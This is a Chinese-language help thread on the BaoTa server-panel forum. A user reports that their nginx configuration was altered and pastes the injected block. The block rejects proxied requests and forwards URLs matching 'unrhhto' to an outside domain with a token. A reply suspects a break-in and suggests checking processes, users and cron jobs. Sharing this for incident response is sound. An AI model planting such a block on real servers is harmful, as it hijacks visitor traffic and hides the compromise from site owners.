宝塔618特惠活动,企业版999元/年,宝塔SSL证书买1送1!限时抢购!查看活动
当前位置:论坛首页 > Linux面板 > 求助

【已解答】nginx配置文件被篡改

发表在 Linux面板昨天 11:30 [复制链接] 1 43

为了能快速了解并处理您的问题,请提供以下基础信息:
面板、插件版本:9.6.0


系统版本:Alibaba Cloud Linux 3.2104 LTS 64位

问题描述:

nginx配置文件被篡改,篡改内容:
if ($http_x_real_ip) {
            return 403;
        }
        if ($http_x_forwarded_for) {
            return 403;
        }
location ~* /.*unrhhto.* {
    proxy_set_header X-Static-Token "mz6dsMIfNyNVl5cA";
    proxy_pass http://0523.xinchunkuaile.top;
    proxy_set_header Host 0523.xinchunkuaile.top;
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
    proxy_set_header REMOTE-HOST $host;
    proxy_http_version 1.1;
    add_header X-Cache $upstream_cache_status;
    set $static_fileMJrCAYTq 0;
    if ($uri ~* "\.(gif|png|jpg|css|js|woff|woff2)$") {
        set $static_fileMJrCAYTq 1;
        expires 1m;
    }
    if ($static_fileMJrCAYTq = 0) {
        add_header Cache-Control no-cache;
    }
}
查看面板的操作日志并未发现异常,配置文件的权限是444
相关截图(日志、错误):

使用道具 举报 只看该作者 回复
发表于 4 小时前 | 显示全部楼层
可能是被入侵了,可以检查一下是否有异常进程,用户、定时任务等等
如需安全运维服务,可联系我司安全运维客户经理
ab.png
使用道具 举报 回复 支持 反对
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

普通问题处理

论坛响应时间:72小时

问题处理方式:排队(仅解答)

工作时间:白班:9:00 - 18:00

紧急运维服务

响应时间:3分钟

问题处理方式:宝塔专家1对1服务

工作时间:工作日:9:00 - 18:30

宝塔专业团队为您解决服务器疑难问题

点击联系技术免费分析

工作时间:09:00至18:30

快速回复 返回顶部 返回列表